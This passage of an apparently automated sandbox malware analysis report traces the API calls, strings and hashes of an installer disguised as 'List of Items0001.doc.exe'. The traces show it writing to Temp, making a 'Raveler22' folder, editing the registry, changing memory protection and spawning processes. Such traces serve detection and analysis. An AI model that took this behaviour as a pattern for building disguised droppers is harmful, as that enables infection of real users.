                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnB66F.tmp,00000023,00000011,00000002), ref: 004024D5
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsnB66F.tmp,00000000,00000011,00000002), ref: 00402515
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnB66F.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Strings
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp
                                                • API String ID: 2655323295-2763165107
                                                APIs
                                                  • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4iv.iv,?,76692EE0,00405D94,?,76693420,76692EE0,00000000), ref: 00405FF0
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50, 4iv.iv,?,76692EE0,00405D94,?,76693420,76692EE0,00000000), ref: 00406098
                                                • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50, 4iv.iv,?,76692EE0,00405D94,?,76693420,76692EE0), ref: 004060A8
                                                Strings
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: 4iv.iv$P_B
                                                • API String ID: 3248276644-1145220235
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004061A5
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                Strings
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-3756726018
                                                APIs
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4iv.iv,?,76692EE0,00405D94,?,76693420,76692EE0,00000000), ref: 00405FF0
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22,?,00000000,000000F0), ref: 0040164D
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22, xrefs: 00401640
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22
                                                • API String ID: 1892508949-1275126094
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0040348D
                                                  • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                • SetFilePointer.KERNELBASE(0000530D,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                Similarity
                                                • API ID: FilePointer$CountTick
                                                • String ID:
                                                • API String ID: 1092082344-0
                                                APIs
                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnB66F.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Similarity
                                                • API ID: Enum$CloseValue
                                                • String ID:
                                                • API String ID: 397863658-0
                                                APIs
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnB66F.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID:
                                                • API String ID: 3356406503-0
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                APIs
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                Similarity
                                                • API ID: CloseDeleteValue
                                                • String ID:
                                                • API String ID: 2831762973-0
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                APIs
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
                                                • CloseHandle.KERNEL32(?), ref: 00405C81
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3712363035-0
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                  • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                  • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                  • Part of subcall function 004069C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 0040615C
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                • GetLastError.KERNEL32 ref: 00405C2A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                APIs
                                                • EnumWindows.USER32(00000000), ref: 6DB62C57
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: EnumWindows
                                                • String ID:
                                                • API String ID: 1129996299-0
                                                APIs
                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                  • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FilePointerwsprintf
                                                • String ID:
                                                • API String ID: 327478801-0
                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                APIs
                                                • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00411DEC,0040CEF0,00403579,0040CEF0,00411DEC,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                APIs
                                                • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                APIs
                                                • VirtualProtect.KERNELBASE(6DB6505C,00000004,00000040,6DB6504C), ref: 6DB62A9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,Call,?), ref: 004064F9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                APIs
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,004030A8,004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000), ref: 00405725
                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00405737
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                  • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
                                                  • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                  • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                  • Part of subcall function 00406AE0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B13
                                                  • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                • String ID:
                                                • API String ID: 2972824698-0
                                                APIs
                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
                                                • lstrcatW.KERNEL32(?,Call), ref: 00404C28
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                                  • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                  • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                  • Part of subcall function 004068EF: CharPrevW.USER32(?,?,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                  • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                  • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                  • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22$Call$H7B
                                                • API String ID: 2624150263-1674876323
                                                • Opcode ID: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
                                                • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                • Opcode Fuzzy Hash: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
                                                • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                APIs
                                                  • Part of subcall function 6DB612BB: GlobalAlloc.KERNEL32(00000040,?,6DB612DB,?,6DB6137F,00000019,6DB611CA,-000000A0), ref: 6DB612C5
                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6DB61D2D
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 6DB61D75
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 6DB61D7F
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB61D92
                                                • GlobalFree.KERNEL32(?), ref: 6DB61E74
                                                • GlobalFree.KERNEL32(?), ref: 6DB61E79
                                                • GlobalFree.KERNEL32(?), ref: 6DB61E7E
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB62068
                                                • lstrcpyW.KERNEL32(?,?), ref: 6DB62222
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6DB622A1
                                                • LoadLibraryW.KERNEL32(00000008), ref: 6DB622B2
                                                • GetProcAddress.KERNEL32(?,?), ref: 6DB6230C
                                                • lstrlenW.KERNEL32(00000808), ref: 6DB62326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                • Associated: 00000000.00000002.674065823896.000000006DB60000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.674065893260.000000006DB64000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.674065926322.000000006DB66000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID:
                                                • API String ID: 245916457-0
                                                • Opcode ID: c9ac9633c89436085c84f8c36d0acaadc3e13055fcaf37eb4db566381742bcbe
                                                • Instruction ID: d8511975624d3df5c1857921f5d98ef38c3ce78a3f82f9ef36ab81e0a035f806
                                                • Opcode Fuzzy Hash: c9ac9633c89436085c84f8c36d0acaadc3e13055fcaf37eb4db566381742bcbe
                                                • Instruction Fuzzy Hash: 00229D71D186CADFEB21CFA8C4806EEB7B0FB09395F54852ED1A5E7288D7709581CB60
                                                APIs
                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22, xrefs: 00402269
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22
                                                • API String ID: 542301482-1275126094
                                                • Opcode ID: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                • Opcode Fuzzy Hash: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 81649c9ef60b362743358cc04841f69d280dec374dabcafdd230337d8cd45dd0
                                                • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                • Opcode Fuzzy Hash: 81649c9ef60b362743358cc04841f69d280dec374dabcafdd230337d8cd45dd0
                                                • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                • DeleteObject.GDI32(00000000), ref: 0040512B
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                  • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                • GlobalFree.KERNEL32(?), ref: 0040546B
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                • ShowWindow.USER32(?,00000000), ref: 00405615
                                                • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                • ShowWindow.USER32(00000000), ref: 00405627
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
                                                • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
